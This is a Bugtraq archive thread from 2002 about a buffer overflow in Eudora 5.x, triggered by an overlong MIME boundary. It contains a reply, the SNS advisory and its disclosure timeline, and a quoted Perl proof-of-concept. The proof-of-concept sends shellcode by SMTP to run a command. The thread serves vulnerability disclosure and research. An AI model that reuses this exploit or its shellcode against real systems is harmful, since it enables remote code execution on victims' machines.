Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability

From: Steven Michaud <smch () midway uchicago edu>
Date: Fri, 9 Aug 2002 21:19:17 -0500 (CDT)
It's not too surprising that this exploit doesn't work on English
Windows 2000 Pro, with or without SP2.  But I can't even get it to
crash Eudora (5.1 or 5.1.1) unless I open the hacked message,
right-click on it, and feed it through the "Unwrap Text" plugin.

Has anyone ported this exploit to English Windows 2000?  If so, when
is the exploit triggered?  (In the preview pane?  When you open the
message?  Under some other circumstances?)

Likewise, when is the exploit triggered on Japanese Windows 2000 Pro?

Thanks in advance!

On Tue, 6 Aug 2002, Kanatoko wrote:



This is a proof of concept exploit for Eudora 5.x buffer overflow.

Tested on:
  Japanese Windows 2000 Professional SP2
  Eudora Version 5.0.2-Jr2


#!/usr/local/bin/perl

#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil () jumperz net>
# http://www.jumperz.net/
#---------------------------------------------------------------------

use Socket;

$connect_host   = 'mail.jumperz.net';
$port           = 25;
$env_from       = 'anvil () jumperz net';
$env_to         = 'target () jumperz net';
$from           = 'anvil () jumperz net';
$to             = 'target () jumperz net';

$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

        #egg written by UNYUN (http://www.shadowpenguin.org/)
        #57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf  = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll

$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;

print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D

From: $from\x0D

To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;


--
Kanatoko  <anvil () jumperz net>
JUMPER : http://www.jumperz.net/(Japanese)


On Mon, 05 Aug 2002 15:24:25 +0900
snsadv () lac co jp wrote:


----------------------------------------------------------------------
SNS Advisory No.55
Eudora 5.x for Windows Buffer Overflow Vulnerability

Problem first discovered: 6 Jun 2002
Published: 5 Aug 2002
----------------------------------------------------------------------

Overview:
---------
  Eudora 5.x for Windows contains a buffer overflow vulnerability,
  which could allow a remote attacker to execute arbitrary code.

Problem Description:
--------------------
  Eudora developed and distributed by QUALCOMM Inc.
  (http://www.qualcomm.com/), is a Mail User Agent running on Windows
  95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.

  The buffer overflow occurs when Eudora receives a message using a long
  string as a boundary, which is used to divide a multi-part message into
  separate parts.  In our verification environment, we have found that
  this could allow arbitrary commands to be executed.

Tested Version:
---------------
  Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
  Eudora 5.1.1 for Windows (Sponsored Mode) [English]

Tested OS:
----------
  Microsoft Windows 2000 Professional SP2 [Japanese]
  Microsoft Windows 98 SE [Japanese]

Solution:
---------
  The problem will be fixed in the next release of Eudora.
  The vendor has not reported when the next release will be available.

Communication background:
-------------------------
 6 Jun 2002  : We discovered the vulnerability.
 6 Jun 2002  : We reported the findings to Livin' on the EDGE Co., Ltd.
               (user support of Japanese version) .
 14 Jun 2002 : the findings were reported again to Livin' on the EDGE Co.,
               Ltd. .
 17 Jun 2002 : We contacted QUALCOMM Inc. .
 18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
               investigation of the problem.
 3 Jul 2002  : We asked QUALCOMM Inc. about the progress of the
               investigation
 19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
               investigation
 24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
               of this advisory
 25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
               the next release
 5 Aug 2002  : We decided to disclose this vulnerability due to concern
               over the potential consequences this issue may cause.
               Livin' on the EDGE Co., Ltd. has not provided any comments
               on this issue as of August 5, 2002.

Discovered by:
--------------
  Nobuo Miwa (LAC / n-miwa () lac co jp)

Disclaimer:
-----------
  All information in these advisories are subject to change without any
  advanced notices neither mutual consensus, and each of them is released
  as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences
  caused by applying those information.

------------------------------------------------------------------
SecureNet Service(SNS) Security Advisory <snsadv () lac co jp>
Computer Security Laboratory, LAC  http://www.lac.co.jp/security/
Previous By Date Next
Previous By Thread Next

Current thread: